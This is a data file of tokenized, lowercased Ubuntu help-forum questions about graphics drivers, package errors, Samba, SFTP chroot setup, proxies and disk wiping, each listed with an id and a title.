280825	black tty screens	i get black tty screens when i hit ctrl-alt-f1 . i already read all other similar questions but i ca n't seem to find a suitable solution . here is my setup . i have a fairly new laptop ( jan 2013 , asus g55vw ) . it runs with efi , came with windows 8 . i wiped out windows 8 and installed ubuntu precise lts . it has a nvidia gtx 660m and i am using the 310.14 drivers . i tried fiddling with the kernel boot options ( nomodeset , agp=off , video=efifb , setting some obscure resolutions and mtrr options , etc ... ) as suggested by other threads . i tried the framebuffer=y trick too ... i tried booting without splash , or booting in safe mode , etc . nothing worked . one funny thing though , when removing the `` quiet splash '' from the kernel boot options , after grub , the screen remains purple ( default grub color ) and i see black lines appearing one by one on the left , i guess these are the kernel messages that are not being diplayed properly . in grub , i ran the videoinfo command and this is what it gave me : list of supported video modes : adapter 'cirrus clgd 5446 pci video driver ' : no info available adapter 'bochs pci video driver ' : no info available adapter 'efi gop driver ' : 0x000 1920 x 1080 x 32 direct ... ... ( typed it myself from a picture i took , so i shortened it a bit ) see the output of dmesg here : http : //pastebin.com/1tjqehpr in particular , note the following lines : [ 0.000000 ] no agp bridge found [ 1.187154 ] vgaarb : device added : pci:0000:01:00.0 , decodes=io+mem , owns=io+mem , locks=none [ 1.187157 ] vgaarb : loaded [ 1.187158 ] vgaarb : bridge control possible 0000:01:00.0 [ 1.233375 ] efifb : probing for efifb [ 1.237336 ] efifb : framebuffer at 0xc0000000 , mapped to 0xffffc9000b700000 , using 8128k , total 8128k [ 1.237338 ] efifb : mode is 1920x1080x32 , linelength=7680 , pages=1 [ 1.237339 ] efifb : scrolling : redraw [ 1.237341 ] efifb : truecolor : size=8:8:8:8 , shift=24:16:8:0 [ 1.237426 ] console : switching to colour frame buffer device 240x67 [ 1.237454 ] fb0 : efi vga frame buffer device [ 12.787856 ] nvidia : module license 'nvidia ' taints kernel . [ 12.787858 ] disabling lock debugging due to kernel taint [ 12.814355 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 12.814361 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 12.814364 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 12.814424 ] nvrm : loading nvidia unix x86_64 kernel module 310.14 tue oct 9 11:52:41 pdt 2012 what should i do ?
280826	why does kde not show up following install kubuntu-desktop ?	i installed kde with apt-get install kubuntu-desktop as suggested . the packages were downloaded and installed . however , following reboot it went straight to the old ubuntu unity . did i miss something ?
280830	third screen on laptop with usb ?	i 'm currently running ubuntu on a laptop provided with vga and hdmi ports , also , i have two 22 inches monitors which i would like to connect to the laptop to work with three screens . first . vga + hdmi wo n't work at the same time , i think that 's a bios problem rather than driver since it was n't able at windows neither . second . i saw a few usb2vga / usb2dvi adaptors that i would like to ask you about . has any body been able to make it work on ubuntu 12.04 / 12.10 ? since those have their own gpu , how compiz works ? is there any specific chipset that i should look for ? any special tweak that should be done ? is there any problem with screen resolution ? ( 1680x1080 ) any information would be appreciated . thanks !
280834	nautilus sort order with ls	i am creating image sprites and have neatly named around 100 files . i am using the following to generate an image sprite from individual images : convert $ ( ls -w 1000 ) +append sprite.png i have just noticed that nautilus 3.4.2 sorts by name differently from ls . is there a way to get ls to use the same ordering as nautilus ( and not the other way around ) ? example nautilus order : cloudy_with_heavy_rain.png cloudy_with_heavy_rain_night.png ls order : cloudy_with_heavy_rain_night.png cloudy_with_heavy_rain.png
280841	local cgi server	i 'm doing some python cgi programming and was wondering if there was a script for running cgi instead of having to install an entire lamp server for doing it . i 've been using cgihttpserver but it requires a cgi-bin folder in which to run the scripts . i want something that can run in the home folder but does n't require lamp to be installed . thanks guys .
280844	text launcher in gnome classic	how do i create a text based launcher in gnome classic ? i want to be able to keyboard shortcut and have a list of apps come up as i type just like gnome 3 , unity and windows 7 has .
280846	what are all these `` untitled window '' icons in launcher and how do i get rid of them ?	they just showed up this afternoon . currently running applications ( off the top of my head ) : chrome skype phpstorm pandora xchat terminal dropbox conky vagrant ( 1 vm running ) terminal i quit all applications and the icons did n't go away . has anybody else experienced this ? does anybody have at least some pointers for how to figure out what 's even going on ? thanks , any help is much appreciated ! edit forgot to mention : each of the launcher icons has a blank menuitem where the program name should be and `` unlock from launcher '' and `` quit '' that show up upon right clicking the icon . none of these actually do anything when clicked , though .
280847	installing source code in a package manger	so , in my quest to start learning more about linux , i want to start compiling software . note : any additional information or side information is greatly appreciated i have a program that i wish to install from github : https : //github.com/grive/grive is there any way i can add this as a repository ? and automatically get the files from it when there is an update ? if not , obviously i 'd have to compile myself . it 's a little confusing because ( i know what compiling actually does - high level language to binary ) sometimes you have to make , sometimes you have to ./configure , ect . not to mention you have to keep the files all in the same folder you compiled in , which is really annoying because i dont know if additional files are being moved somewhere on my system , and i ca n't delete them simply by removing the folder which i compiled in ... anyways , at one point or another i probably sounded really stupid trying to explain my understanding - tl ; dr how do i turn source code into something my package manager can use for automatic updating with apt ?
280849	mount bind with full ownership and permissions	i am using 12.10 on virtualbox . i have my windows documents folder shared through virtual box folder share . then i wanted to use mount -- bind to mount my documents folder to the ubuntu user documents folder under ~/documents here is the command i am using : sudo mount -- bind /media/d/leinardo/documents ~/documents when i do this however , i find that the ~/documents folder now is owned by root and i do not have write access . any ideas ? thanks in advance .
280854	environment var _	i send a printenv command in the commandline and i see one of the variables is the following : _=/usr/bin/printenv i now do this : mo @ mo-toshiba ~/workspace $ printenv _ /usr/bin/printenv but when trying to call echo on this variable i get the following : mo @ mo-toshiba ~/workspace $ echo $ _ _ what gives ? why does n't echo treat this as a variable ? ( ie . like $ path or $ pwd )
280858	windows filesystems on ubuntu	i currently have 2 hard drives , 1 running my windows os and all my applications , and another for saving all my chunky media files . if i was to wipe my hard drive which holds windows and install ubuntu on it , would my second ntfs hard drive still work* ? *by work , i mean operate seemlessly as it does in windows ; letting me read and write media files with ease .
280859	samba shares , using smb.conf or /var/lib/samba/usershare	ok , so i caused my own problem by trying to be funny . and now i am very confused about how to fix it . so here we go : our server has had 2 open shares since day one . only one of them offered windows users write permissions , and the other worked fine for mac or *nix boxes . both files looked as follows . /etc/samba/smb.conf [ homeshare ] path = /home/ browseable = yes read only = no guest ok = no force create mode = 0775 force directory mode = 0775 valid users = @ users this has worked fine for years , and allows our users to connect with their windows desktops and have read\write permissions all fine . /var/lib/samba/usershare/home # version path=/home comment= usershare_acl=s-1-1-0 : r guest_ok=n this , we do n't really know why was setup , never needed or used . but took forever to finally trace down and remove several months ago . so to get to the point i thought it would be funny to comment out the share definition in the smb.conf # i just blocked out the lines . so that the information would n't be lost , just not read after restarting samba . then recreated the share file in /var/lib/samba/usershare/home except changed the name to homeshare , a quick $ sudo service smbd restart later and voila suddenly the network share claims to be readonly . my problem is that after removing the file from samba/usershare/ and un-commenting the original [ homeshare ] definition , neither restarting samba , or a full system reboot allows write access again . i changed the share name to [ homeshares ] and everything works perfectly again . so my guess is there is some cached record someplace of the name with the wrong permissions . any help or suggested directions to clear this error would be most useful .
280861	installing from usb to a new hd - drive not found	i just bought a new hard drive and attached it to my windows 7 machine to format it ( ntfs ) and create a single , primary partition . then i put it into the machine i want to install ubuntu on and ran the set-up from usb . i get through to the point of chosing the storage location , then the install errors out , saying that it has unexpectly stopped . on the screen it lists only `` dev/sda '' but no volumes are displayed . if i click any button on this screen ( other than `` back '' or `` cancel '' the error appears . after i send in the error report , the screen drops to a console display that accepts no input . do i need to reformat the drive as something other than ntfs ? or do i need to set up a different kind of partition , or remove the partition ? i 'm just not sure what the initial state of the hard drive should be in order for ubuntu to install to it . thanks
280863	getting error installing updates ( in canada )	i am trying to install updates for a dell xps running ubuntu 12.04 lts . it fails with the following error : failed to download package files check your internet connection . details failed to fetch http : //ca.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-quantal/libgl1-mesa-dri-lts-quantal_9.0.2-0ubuntu0.1~precise1_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //ca.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-quantal/libgl1-mesa-glx-lts-quantal_9.0.2-0ubuntu0.1~precise1_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //ca.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-quantal/libglapi-mesa-lts-quantal_9.0.2-0ubuntu0.1~precise1_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //ca.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-quantal/libxatracker1-lts-quantal_9.0.2-0ubuntu0.1~precise1_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //ca.archive.ubuntu.com/ubuntu/pool/main/n/nautilus/libnautilus-extension1a_3.4.2-0ubuntu7_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] ... at the time of this posting , these files are not on the server . how do i fix this problem ?
280875	how to check a program that currently using connection ?	is there a command/program to check what program/daemon that currently using network connection or downloading updates behind the scene ? everytime i boot ubuntu , i ca n't use the internet for 4-10 minutes because some program downloading some updates . i have check my software update configuration , it already set to weekly .
280878	controlling gtx titan on ubuntu 12.04	i have installed ubuntu 12.04 and the latest nvidia 313.30 driver from their official site on my new system : msi bigbang xpower ii i7 3930k 64 gb 1833mhz ddr3 evga gtx titan superclocked i 've run the unigine-heaven benchmark on it and the results were similar to windows : ~20 fps settings : 2560x1440 ultra x8 anti aliasing ao tesselation factor : 75 % tesselation range : 75 % vsync but then i was wondering about the gpu frequency , in the configuration tool of the nvidia x server the maximum clock speed is 575mhz , which is , compared to the actual 836mhz base clock , quite low . there 's also no fan speed control available . i was looking for an overclocking tool for nvidia cards under linux and found `` nvclock '' which i installed using apt-get : sudo apt-get install nvclock but unfortunately i could n't use it because of a bug . when i tried to use it had thrown a segmentation fault error . and now here i am , i 've no control over my titan at all under linux , ca n't manipulate core and memory clock speed , ca n't change the fan speed . do you guys have some ideas that could help solving this problem ? by the way : why is it still running on gen2 pcie ? !
280880	how to use google search instead of opendns search in firefox	i love opendns and i love google and i love firefox but they do not play nicely together . opendns gives me awesome functionality beyond any other dns server right now so that i can lock my internet to my desired settings . googledns is coming along but nowhere near the functionality . one little problem . the following standard tweak to set the firefox url bar to do google searches , does not work 1 ) type about : config in url bar 2 ) for keyword.url type https : //www.google.com/search ? btng=google+search & q= 3 ) set keyword.enabled to true doing this tweak does nothing ( in ubuntu 12.04 firefox version 20 ( ubuntu for powerpc ) ) how can i get my google seach back whilst keeping my beloved opendns ? firefox is the only browser that has this problem .
280882	can not format usb drive to ext4	i 'm trying to format usb drive ( some noname 32gb ) to ext4 . it always hangs on step writing superblocks ... and always stops writing numbers after it reach to 125/256 . i 'm use command mkfs.ext4 /dev/sdd1 . command eventualy finishes , but drive is unmountable . do you think it is hardware broken or is there a way to fix it ? i would like to use it with openelec on rapberrypi . i tried gparted live and gparted in ubuntu with same result . i 'm going to try some usb drive check on windows , because it works as ntfs . i have also tried gparted on different computers . edit : i have now tried another flash drive ( 8gb kingston ) and it worked without issue . is there some proven way to test flash drives ? edit : ok , so i tried some test i found ... https : //dl.dropboxusercontent.com/u/16550256/cinska % 20flashka.png guess that 's it .
280892	directly deleted my windows patition directly and now without the bootloader the windows wont boot	i deleted my ubuntu partition directly and now as it ca n't boot so i tried a bootable windows usb to reinstall windows or repair windows but ca n't because the hard drive has been locked or write protected ... .
280894	changing write permissions for jailed sftp denies login	i have scouted over many websites and forums on how to setup an sftp user that is jailed to a certain directory using chroot . here are the steps i have followed but i ca n't seem to get write permissions to work . setup sshd_config # subsystem sftp /usr/lib/openssh/sftp-server subsystem sftp internal-sftp match group webmaster x11forwarding no chrootdirectory % h allowtcpforwarding no forcecommand internal-sftp create folder mkdir /var/www/sites create user and group useradd uploader passwd uploader usermod -d /var/www/sites uploader groupadd webmaster uploader groupadd www-data uploader permissions and ownership chown root : root /var/www chmod 755 /var/www/sites now with these settings the user uploader is able to sftp into the home directory but is unable to write to the directory . there are 2 typical errors that occur , i either ca n't login or i do n't have write permissions . login error error : network error : software caused connection abort error : could not connect to server changing permissions of /var/www/sites to 775 or 777 causes login error . chown /var/www/sites to uploader : root causes login error . chwon root : webmaster or root : www-data i have no write permissions i am at odds end trying to figure this out and if anyone could point me into the right direction i would be greatly appreciate it . thank you .
280896	why do i have no prompt in terminal on xfce in ubuntu 12.04	i have ubuntu 12.04 and have tried a few desktop environments . i am currently testing out xfce . it has a terminal emulator called `` terminal '' . when i launch it , i just get a black screen . xterm , uxterm and konsole all work normally where 's my prompt ?
280900	ubuntu 12.10 ca n't detect new hard drive	so i was creating a partition table on my brand new seagate 3tb hdd when a short power outage hit . now , ubuntu wo n't detect that the hard drive is their ; it does n't show up in gparted or fdisk -l .
280904	how to reopen the folders that were open before shutdown ?	i know how to configure it on windows but do n't know if ubuntu has this feature . is it possible ?
280909	cant update software or connect to software servers ( universe etc )	it says could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) when i type sudo apt-get update & & sudo apt-get upgrade in the terminal . can anyone help ?
280916	issues with unity after installing and uninstalling fglrx again	i tried to install fglrx drivers on ubuntu 13.04 , but that did n't work out . i then went back to the open source drivers ( via update-manager ) but i could n't boot into a graphical os . i got a black screen with a prompt to log in . i got in , launched lightdm manually , and reinstalled the oss drivers ... and now i have them installed , and i even seem to be using them ( chrome : //gpu reports that i am , and i can move things around the screen ) . but everything is screwed up - i ca n't get unity to launch , i 'm still booting into the black screen , and i ca n't seem to fix this . help ? edit : i removed fglrx completely , and i now boot into a ui , but it 's just a desktop background . no unity . edit2 : i can now launch unity manually ... but it does n't have any of my old settings , and does n't have any plugins etc . so that 's still not working great . edit3 : i went into ccsm and reenabled all of the plugins like unity and gave default settings . idk what else but something broke unity , i can no longer launch it .
280920	ubuntu 12.04 can not get epson l210 to work with scanner ( xsane )	i have ubuntu 12.04 installed . i just bought an epson l210 print/copy/scanner . i can use it to print , but can not get it to work with xsane or simple scan . i downloaded the linux driver for this from epson ( http : //download.ebz.epson.net/dsc/search/01/search/searchmodule ) and installed it using the unbuntu software center . the version i installed was iscan_2.29.1-5~usb0.1.ltdl7_i386.deb . what happens when i click xsane is i get this message : failed to open device ... i have also tried to modify the backend in terminal using the procedure on this page : https : //help.ubuntu.com/community/scanners , but no dice . i was able to scan with xsane with my previous brother printer . although i have been using ubuntu for more than 3 years i am not that technically adept . if anyone can offer any help , please bear that in mind -- i will need baby steps ! thanks in advance for any assistance .
280924	how to make iphone as a mouse via bluetooth	ubuntu 12.10 , bluetooth 2.0 i 'm looking for a way to use my iphone as a mouse using bluetooth connection . it 's already and certainly work when i 'm using mac or windows . the reason why i want to use bluetooth is because when i try use adhoc connection , there is a lag between my iphone ( mouse ) and output on the computer . anyone know how to setup iphone 's mouse via bluetooth ?
280926	problem with `` apt-get update '' command !	i ca n't update my ubuntu repository list , i try `` sudo apt-get update '' but i get this error : get:15 http : //dl.google.com stable release.gpg [ 1,540 b ] hit http : //dl.google.com stable release get:16 http : //dl.google.com stable release [ 1,540 b ] ign http : //dl.google.com stable release e : gpg error : http : //dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 does anyone can help me to fix this problem ?
280934	how to connect to internet in fresh installed ubuntu 12.04 server	i have installed fresh ubuntu server 12.04 lts ( only command line and gui is not available ) and want to connect to internet for some project work on snort please help me what to do next ?
280938	amd catalyst drivers increases screen contrast if laptop is on battery power	how to prevent catalyst drivers from increasing contrast if i switch from power supply to battery power ? one oddity about this is that increase in contrast is n't shown in the drivers settings , e.g . if contrast is set to 80 , then the number stays 80 , but contrast is still messed up while on battery power . another problem is that even if i then manually try to decrease contrast to about 50 ... 60 then the screen still does n't look quite right .
280944	what automated intrusion notification/detection setup is good for home desktop use ?	i 've been using linux for quite a while now and i always feel the need to have a passive software / script setup which can alert me of any suspicious network activities like scans , failed login attempts , etc . on the fly via email or by visual/audio notifications . i know how to look up through logs and stuff but for the most part it is a manual , time consuming process . i 'm looking for something that is semi/fully automated with some good log parsing capabilities . i 'm aware of ids systems for monitoring networks like snort , etc . but they are an overkill for the average home user and a painful process to get up and running . what is a good option for me as a home user ?
280948	iptables does n't redirect http traffic to my squid proxy !	i arranged a transparent squid proxy which listens to port 3128 on localhost , to block some web sites . i 've tested the proxy using firefox , and it works . then i ran this , hoping to redirect all the http requests to the proxy : sudo iptables -t nat -a prerouting -p tcp -j redirect -- to-ports 3128 sadly , nothing happens . the other browsers in my system do n't seem to be using the proxy . i do n't want to configure each browser , to use the proxy either . sudo iptables -l shows no rules assigned . i 'm on ubuntu 13.04 , and using a 3g usb modem ( ppp0 ) to connect to the internet . any advice is appreciated !
280949	port forward server through vpn connection	we currently use pidgin to connect to a sametime server , however for this to work , we must be connected to a vpn ( cisco ) . for 99 % of us , there is n't an issue with having the cisco vpn client installed on each machine , as we also use other resources on the vpn , however , a small number of users must be able to connect to sametime , however not to the vpn . as you can see from the image above , under the `` current '' setup , we simply have pidgin and the cisco vpn client installed on every machine . as part of the vpn , we must also use a proxy which restricts the internet usage to the point where it 's unproductive ( split tunneling is n't possible from the server side ) . i 've been trying to implement the `` proposed '' setup with ubuntu , using vmware/virtualbox however i 'm yet to get anything to work . i have tried a combination of things , from single to dual nic 's ( both nat and bridged ) , installed rinetd to try and forward the ports ( 1533 ) and i have also tried the built in port forwarding within vmware/virtualbox . pidgin supports turn/stun , plus socks/http proxies , so i 'm keen to find a way that i can setup a man-in-the-middle server that will connect to the vpn and then i can configure the pidgin clients to use the ubuntu server as a proxy ? has anyone ever been able to do something like this ?
280956	unable to load windows or its drives . data in those drive is important	i was using windows 8 on my dell inspiron 14z 5423 . then i installed ubuntu from live usb . while installing , i chose 2nd option ( other , ( not replace windows 8 ) ) . then it asked create partition . i created & installed ubuntu 12.10 on / directory . now i 'm ca n't load windows or its drives . data in those drive is important . i tried boot-repair from linuxsecureremix . but still not getting loaded . this is link after doing boot repair utility . http : //paste.ubuntu.com/5703933/
280966	finding out the buffer size of external hdd connected via usb	i want to securely delete the hdd using dd because i intend to sell it . using the buffer will speed up the process . i ca n't find out the size though : arno @ arno-x55a : ~ $ hdparm -i /dev/sdb /dev/sdb : permission denied arno @ arno-x55a : ~ $ sudo hdparm -i /dev/sdb [ sudo ] password for arno : /dev/sdb : hdio_get_identity failed : invalid argument
280971	disable a key on an os level	i have a volume control wheel on the basse of my laptop which i always spin by mistake . when spun , the letters 6~ start to pop up in rapid succession . annoying as this is , when in my vim environment , it starts to run along my sentence and change the case of all my characters . this iss not the only problem , this is the most inconvinent one though . i have tried add ing the folliwing to my .vimrc but this is n't working as predicted : ( n , v , i ) noremap any advice would be greatly appreciated .
280972	how to understand nvidia-settings save configuration options ?	after installing a proprietary driver for my nvidia graphics card gksu nvidia-settings was run from terminal through which have checked the configuration of my graphics card but am unsure where to save the configuration file after attempting to save it for system to use if for example i wanted to add a second monitor or make resolution changes . newer flavors do not use /etc/x11/xorg.conf and do not understand how to get the most out of my proprietary driver and graphics card . it appears nvidia-settings only confirms how the card is being used . rather than its intended use of making configuration changes . which appears to be uʍop ǝpısdn and/or ʍɹouƃ ʍɐʎ ɹonup to me . anybody want to share how to use nvidia-settings save configuration options whilst explaining how this driver works with no apparent etc/x11/xorg.conf file ? ( or how is system using card and driver if there is not any /etc/x11/xorg.conf file being used ? )
280973	black screen during shutdown	good morning . i 'm testing the 13.04 64bit with gnome-shell 3.6.3.1 . it happens randomly after choosing shutdown of the machine , i receive a black screen `` stuck '' ( no splash screen , no messages ) . obviously the machine does not turn off and get stuck in that phase until i restart it manually . i looked at the syslog and i found this : apr 12 22:49:20 banco-dt colord : device removed : xrandr-philips consumer electronics company-philips 170c- bz 226700 apr 12 22:49:20 banco-dt colord : profile removed : icc-e5133a63b0b32ba08084148e2c179a10 apr 12 22:49:20 banco-dt gnome-session [ 1559 ] : critical : gsm_manager_set_phase : assertion `gsm_is_manager ( manager ) ' failed apr 12 22:49:20 banco-dt gnome-session [ 1559 ] : gtk-critical : gtk_main_quit : assertion `main_loops ! = null ' failed from the first line , it seems to make sense to have no signal in the monitor . the two critical following errors seem to be the cause of the stuck . any idea ? p.s . sorry for my poor english bancaldo .
280974	cant install a thing !	ok . so when i try to install a something in the terminal , i get : e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i then try using apt-get -f install , but then : dpkg : warning : there 's no installed package matching pidgin-facebookchat : amd64 when i try to download pidgin facebookchat ( from the software center ) i ca n't to that either , cause i get a popup saying : items can not be installed or removed until the package catalog is repaired . do you want to repair it now ? i click repair , but it keeps asking me about it . therefore i ca n't either install something from the software center .
280979	a more feature filled mintmenu like applet for xubuntu 12.04	i do not want to install the mintmenu . i am requesting anything that is xfce native . i 'd love to see something like mintmenu written for xfce . i ca n't install mintmenu because the mate desktop does not exist for powerpc yet . running xubuntu 12.04 anyone know of any xfce applets in development that work similarly to the mintmenu ? tia
280980	how to create very very simple gui application for ubuntu ?	i want to make a simple gui application . can anybody give me source code of a simple gui application ? so far , i have been competing in programming competitions ( i have been using c++ for it ) and now i want to get started with application development .
280981	12.10 running slowly	i 'm new to ubuntu and have installed 12.10 on a laptop that previously had windows vista . i installed 12.10 choosing to use the whole c : drive - so in at the deep end ! however , 12.10 runs with a 4 or 5 second lag when it is at its quickest . it also does n't recognize the usb ports ( although there is still power through them ) . the machine has 1.5 gig ram . i have tried reinstalling twice . any ideas on what i should do ? does 12.04 need less juice to run it ? if so , should i try installing 12.04 ? any advice very welcome !
280985	how to remove 12.04 & install 12.10 or 13.04 when i have windows too ?	i was a windows user in the last year i listened good things about ubuntu & finally installed 12.04 on my acer laptop . i found it useful & nice . after 5 months i saw kde & really love that then installed kde package on it & use it for a while & i was happy . but after one update my software center was brooked & i cant install anything on my ubuntu since that update ( i asked that question on askubuntu.com but not a good answer found ) & i found some other problems & now i want to erase ( remove ) that & install a new ubuntu ( 13.04 when released ! or 12.10 ) but i want to keep my windows 7 . so tell me how to install a new one instead of my 12.04 ? ( sorry for my bad english ! thanks ! )
280990	c++ compiler program ide	i have just installed ubuntu 12.10 on my old laptop and i want to start working on it . is there any program like visual studio for ubuntu 12.10 ?
280995	todo list with google keep ?	i run the widget from google keep on my android phone and i 'm quite happy with that . now i want some app/program for that for my ubuntu unity desktop . is there something with google keep sync . ?
280997	12.04-server update failure after full /boot , apt not working , unmet dependencies to non exiting linux-image kernel	unattended upgrade failed after full /boot partition . creating disk-space by deleting old kernels with the recommended command sudo apt-get purge linux-image-x.x.x-x-generic does not work and gives the following reason : the following packages have unmet dependencies : linux-image-generic : depends : linux-image-3.2.0-38-generic but it is not going to be installed linux-image-server : depends : linux-image-3.2.0-38-generic but it is not going to be installed linux-server : depends : linux-headers-server ( = 3.2.0.38.46 ) but 3.2.0.40.48 is to be installed ( i created space on /boot by rm old kernel images ) all suggestions and solutions offered on the questions apt wedged by kernel version mismatch and error sub-process /usr/bin/dpkg returned an error code ( 1 ) while running sudo apt-get install -f do not work , giving the same unmet dependencies . server : ~ $ uname -r 3.2.0-40-generic so kernel is version 40. server : ~ $ sudo dpkg -- list 'linux-image*' ||/ name version description +++-====================-============================================================================ un linux-image < none > ( no description available ) un linux-image-3.0 < none > ( no description available ) ii linux-image-3.2.0-23 3.2.0-23.36 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-36 3.2.0-36.57 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-37 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp un linux-image-3.2.0-38 < none > ( no description available ) ii linux-image-3.2.0-40 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-generic 3.2.0.38.46 generic linux kernel image iu linux-image-server 3.2.0.38.46 linux kernel image on server equipment . kernel 38 is missing , but last two images refer to version 38 server : ~ $ sudo apt-cache policy linux-server linux-server : installed : 3.2.0.38.46 candidate : 3.2.0.40.48 version table : 3.2.0.40.48 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages *** 3.2.0.38.46 0 100 /var/lib/dpkg/status 3.2.0.23.25 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages now i 'm confused . booting into an older kernel 37 gives the same unmet depedencies . trying in a desperate attempt to force the install of the 38 kernel fails : server : ~ $ sudo dpkg -i -- force-overwrite linux-image-generic_3.2.0.38.46_amd64.deb dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-38-generic ; however : package linux-image-3.2.0-38-generic is not installed . using aptitude gives the same problems : although it tries to up/downgrade several packages to resolve the unmet dependencies . can anybody help ?
280998	how can i install proprietary drivers/repo via the command line in 13.04 ?	what do i have to do via the command line , in order to achieve exactly the same thing that the `` software & updates '' graphical application does ? namely , enable a nvidia driver repository and then install it . the reason i want to do this is because the progress bar of my `` software & updates '' is stuck at 1/3 for like forever and i do n't know how to debug what 's wrong .
280999	can i securely erase a hard drive by running `wipe` against `/dev/sdb` ?	i was looking for a comparatively fast way to securely delete a hard drive i intend to sell and i found this in a german ubuntu wiki : wipe -q -q 1 -r /dev/zero -s r -r $ path it said that according to contemporary research this would suffice . is that true ? because it was done in one second : arno @ arno-x55a : ~ $ sudo wipe -q -q 1 -r /dev/zero -s r -r /dev/sdb okay to wipe 1 special file ? ( yes/no ) yes renaming /dev/sdb - > /dev/u8jsynoperation finished . 0 files wiped and 1 special file ignored in 0 directories , 0 symlinks removed but not followed , 0 errors occured . using the standard wipe command resulted in an eta of 2 years for my 2 tb hdd .
281003	how to setup ssh vpn in network manager ?	i am using 12.10 and i want to setup ssh vpn via gui in network manager , but it has only pptp and no other types to select . how can i fix it ? any packages i need to install ?
281006	command line tool to correct whitebalance of scanned pdfs	i have several hundreds of scanned files as pdfs . the scanner i used at the time creates images that have a blue-grey touch , so the white background of the pages is blue/grey instead of white . while this is not a problem while keeping them on a disk , it is problematic when printing them . i was wondering whether there is an easy to use tool that i could use to simply optimize the white balance on those files , assuming the background is always perfectly white ? i tried using gimp but that proved quite tedious as i 'd have to open each scan , save the individual pages and then merge them again .
281008	i am sudo but can not edit file or save it	i became a ubuntu user 3 months ago , and have been trying to utilize my nvidia geforce graphics card approx.10 hours per week . i am attempting to try this offering ; : ~ $ sudo add-apt-repository ppa : bumblebee/stable & & sudo apt-get -y update < enter > : ~ $ sudo apt-get install bumblebee bumblebee-nvidia < enter > : ~ $ gedit /etc/bumblebee/bumblebee.conf < enter > edit line 22 to ´driver=nvidia´ edit line 47 to ´kerneldriver=nvidia´ save and run : ~ $ sudo bumblebee restart < enter > then : ~ $ optirun glxgears < enter > after seeming success at editing , when i try to save and exit i get an unable to access file or unable to obtain permission to read file how do i get permission to change lines in a just installed file so i can finally use my nvidia ge card ? i finally found a good sounding repair but can not even open it .
281009	additional source directories using geany	i 'm using geany in ubuntu as an ide for a c++ project , and i want to use some external libraries ( from webots ) . however , i do n't find the option to specify additional library paths ( as one can find in code : :blocks or netbeans ) . must i specify the paths manually as a build option ? if so , how do i do it ? i 'm not exactly an expert at this kind of stuff .
281010	replace ubuntu boot menu ( imac )	i have a 21.5 '' imac ( intel based ) , and i recently installed ubuntu on a 90gb partition . after i installed ubuntu , i noticed that whenever i boot my machine i get grub where i can select my os ( mac or ubuntu ) . grub came after i installed ubuntu and it is using the ubuntu color scheme , so i know it relates to ubuntu . problem is , that when i am in grub my apple wireless keyboard is not working , and after 10 seconds ubuntu gets auto-selected , and i can not boot into mac os x without a usb keyboard . so i wondered if it is possible to solve this problem , and if not - how can i replace grub to a mac boot menu or maybe to refit ? thanks for any help !
281011	which has the most updated gnome-shell : gnome remix 12.10 or ubuntu gnome 13.04 ?	i am thinking about replacing regular ubuntu 12.04 on my laptop with 13.04 gnome - or gnome remix 12.10 , given that the latter oddly has a longer life cycle as of now . which of the two comes with the more updated state of gnome , out of the box ? if the version numbers of gnome are the same in both , are there any other differences to the gnome-shell experience ? more specifically , i am hoping for the customizations ( shell extensions , user themes ) to become more integrated and well-supported ootb as development proceeds . currently , shell extensions are unofficial self-fixes that may or may not work with different versions of gnome 3 . to be able to use them , one has to install a package that is n't easy to find . similarly , the ability to choose user themes is tied to an unofficial shell extension . that is the kind of things i hope to see improved in the future , possibly even between these 2 versions of ubuntu ?
281014	ati mobility radeon hd 5400 series drivers for ubuntu 12.10	i tried to install ati binary x.org driver for my graphic card ( ati mobility radeon hd 5400 series ) in ubuntu 12.10 but it did n't work . after some googling i found that the latest drivers are not compatible with xorg 1.13 so what should i do now . if i have to downgrade to xorg 1.12 then what would be the procedure for that , and if i have to install some other drivers then from where can i find them ?
281017	how do i change the keyboard layout to a non-standard one on a live ( usb ) session ?	i am running ubuntu 13.04 in a live ( usb ) session . my physical keyboard layout is called băšpo , it is the french language dvorak method-based layout . i would like to change my input layout to this too . to do this , i tried booting in a french spoken session , then open the keyboard layout preferences app . normally , to add a layout , you should click on the + sign and select your layout . however the list that appears is very short and does not contain what i want . on the contrary , on a persistent non-live installation , the choice of băšpo is present . this is also the case during an installation of ubuntu . so i do i change the keyboard layout of my live session to the correct one ?
281018	making batch-file for gnuplot	how can i make a batch file with a series of commandos for gnuplot , and then execute it in gnuplot ? for example : defining a function , setting the x- and y-axis settings , setting an output so when i run gnuplot and execute this file , i immediately got my graph . thanks for reading in advance .
281021	can not log into ubuntu after installation	i have dell inspiron 15r special edition ( 7520 ) lap with windows 7 installed . i installed ubuntu 12.10 in a separate partition . after installation it restarts but no grub shown . it directly log into windows . do i need to enable any thing like dual boot ? any clue ? thanks in advance .
281029	multiple sound outputs with hdmi and speakers . it is possible ? [ ubuntu 12.10 ]	there is a way to configure a simultaneous output from hdmi and speakers sound ?
